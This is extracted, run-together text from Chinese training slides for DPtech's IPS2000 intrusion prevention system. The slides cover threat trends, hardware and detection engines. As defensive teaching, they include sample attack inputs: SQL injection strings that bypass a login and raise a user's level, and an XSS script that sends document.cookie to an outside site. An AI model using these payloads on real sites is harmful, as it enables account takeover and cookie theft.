DPtechIPS2000系列入侵防御系统培训胶片

DPtechIPS2000入侵防御系统根据国家计算机网络应急技术处理协调中心（简称CNCERT/CC）报告，网络安全事件依然持续不断爆发。安全事件不断爆发2009年CNCERT共接收21927件网络安全事件报告趋势一：网络无边界边界在哪里？VPN、移动办公、无线网络等应用日渐增多，网络边界日益模糊，以防火墙为代表的传统边界安全防护手段无能为力趋势二：新业务模式层出不穷WEB2.0云计算P2P应用网上支付趋势三：安全漏洞不断爆发ZeroDayAttack！网络设备、操作系统、数据库软件、应用软件漏洞数不胜数微软操作系统视频功能组件高危漏洞微软Office组件高危漏洞微软IE浏览器0day漏洞域名系统软件Bind9高危漏洞……趋势四：安全威胁多样化02040608010012014016018020013:0019:001:007:0013:0019:001:007:0013:0019:001:007:0013:0019:001:007:0013:0019:001:007:0013:0019:001:007:0013:0019:001:007:0013:0019:00Mbps(AverageperHour)OracleE-mailHTTPP2PRateLimitKazaaeDonkeyWinMX应用层安全威胁蠕虫/病毒网络钓鱼趋势五：利益驱动下的信息犯罪越来越多信息安全事件是以经济利益为驱动病毒、木马、攻击已形成产业链迪普科技拥有从百兆至万兆的全系列入侵防御系统，可覆盖中小型企业、大型企业以及运营商的各种应用层安全防护需求。–N千兆光口千兆电口管理口串口产品系列IPS2000-TS-N高度2U2U1U1U1U1U接口2个管理口(千兆自适应、电口)12个千兆自适用电口(内置3组掉电保护)12个千兆自适应光口，2个万兆光口，1个RJ45串口,1个USB口2个管理口(千兆自适应、电口)6个千兆自适应电口(内置3组掉电保护)6个千兆自适应光口2GE光口，6GE电口，一个插槽，2个GE管理口2个管理口(千兆自适应、电口)6个千兆自适应电口系列产品硬件架构–多核CPU硬件架构提高CPU处理能力，多核并发处理网络流量，提高设备处理性能–内置FPGA硬件以及硬件逻辑检测引擎通过FPGA的硬件检测引擎，极大的提高设备性能以及设备的竞争力系列产品硬件架构–内置高速网络转发和处理芯片网络接口密度高、数量多、接口类型丰富，能够满足各种部署和组网需求–掉电保护模块保证在异常断电等各种突发环境下的网络可用性，从而保证设备的可靠性15–网络操作系统平台自主研发的高性能网络操作系统平台，支撑各种不同的网络产品，同时保障相同产品的各种款型系列资源整合–深度流检测引擎算法的性能与特征多少无关，检测引擎只需对报文内容检测一次，即能满足多种检测需求，如协议特征、病毒特征、IPS特征、url特征等各种特征挖掘，大大提高多复杂并发业务的检测性能–Web应用防护引擎对HTTP报文进行细致分析,完成协议切分、进行解码处理、进行负载处理以及进行语法和语义分析，防护多种Web攻击–DDos检测引擎基于报文内容和统计学原理，精确识别各种DDos攻击超强性能•多核CPU+大容量FPGA，实现不同会话的并行处理•硬件网络加速单元NA按照不同的报文内容，将不同的会话分发到不同的CPU进行处理，同时实现CPU间均衡负载分担•深度流检测引擎只进行一次匹配，输出检测结果供后续策略模块使用攻击防护•漏洞都是由于应用系统的错误导致的，针对不同的防护对象可以开启不同的防护策略•IPS具备全面的攻击防护功能–Web安全–缓冲区溢出漏洞–操作系统漏洞–恶意代码–协议异常功能注入•原理–利用程序中的漏洞，构造特殊的SQL语句并提交以获取敏感信息•危害–获取系统控制权–未经授权状况下操作数据库的数据–恶意篡改网页内容–私自添加系统帐号或数据库使用者帐号某论坛用户登录的页面代码如下：$sql=SELECT*FROMuserWHEREusername='$username'ANDpwd='$password';$result=mysql_query($sql);IE中正常的URL如下：=dptech&&pwd=dptechSQL语句为：SELECT*FROMuserWHEREusername=‘dptech'ANDpwd=‘dptech'：=dptech’/*实际插入的SQL语句变为：SELECT*FROMuserWHEREusername=‘dptech'/*'ANDpwd=''某论坛用户修改密码的页面代码如下：$sql=UPDATE$tblnameSETpwd='$password'WHEREusername='$username';$result=mysql_query($sql);IE中正常的URL如下：=dptech&pwd=dptechSQL语句为：UPDATEuserSETpwd=‘dptech'WHEREusername=‘dptech'语句变为：UPDATEuserSETpwd='abcd',level='3'WHEREusername=‘dptech’构造如下的URL：=dptech&pwd=abcd’,level=’3语法和语义，进行精确识别2.只在GET消息的URL部分和POST消息的负载部分检测，减少误报3.针对知名SQL注入工具进行特征提取(穿山甲、HDSL)4.支持主流数据库的注入攻击(SQLServer/Mysql/Oracle)5.支持SQL注入探测(and攻击/or攻击/数据库类型查询攻击/表名查询攻击等)6.支持SQL注入攻击(联合查询攻击/数据更新攻击/数据删除攻击/通过数据库执行系统命令攻击)•原理–网站对输入过滤不严格–攻击者往Web页面的html代码中插入恶意的数据，用户认为该页面是可信赖的，当用户浏览该页之时，嵌入Web页里的恶意代码/脚本会被执行•危害–存在漏洞的是网站，被攻击的是浏览该网站的用户、攻击者在发贴区域发布脚本，其中包含恶意代码，例如重定向到某个恶意网站scriptdocument.localiton=’’%2Bdocument.cookie/script2、浏览者正常浏览该页面，正常情况下应该看到发布的内容，但服务器在传给客户端的HTML页面中包含了这段代码，导致用户的页面被重定向到恶意网站3、恶意网站可以收集访问它的用户的个人信息的语义，进行精确识别2.只在GET消息的URL部分和POST消息的负载部分检测，减少误报3.针对各种XSS攻击探测进行识别(alert攻击/script攻击/iframe攻击)4.支持多个Web应用程序攻击(phpCommunityCalendar/Tikiwiki/PHPBB等跨站脚本攻击)安全-其他•LDAP注入•目录穿越•命令注入•PHP文件包含攻击防护-缓冲区溢出•原理–栈溢出–堆溢出•危害–获取系统控制权•MS08-067:服务器服务中的漏洞可能允许远程执行代码•漏洞原因：Windows系统在处理特定格式的RPC请求时，在解析其中目录格式的时候存在缓冲区溢出漏洞，远程攻击者可以通过这个漏洞实现对系统的完全控制•攻击报文：等各种浏览器溢出漏洞(MS06-055/MS07-069/MS08-010/MS09-057/MS10-002等IE溢出漏洞)2.各种客户端应用程序溢出漏洞(QQ软件/迅雷下载软件/暴风影音/中国游戏中心/微软OfiiceWordExcel等办公软件)3.各种网络设备溢出漏洞(CiscoIOS/CiscoACS/D-Link路由器)4.Web服务器溢出漏洞(IIS/Apache)攻击防护-操作系统漏洞•原理–操作系统对外提供网络服务存在溢出漏洞•危害–获取系统控制权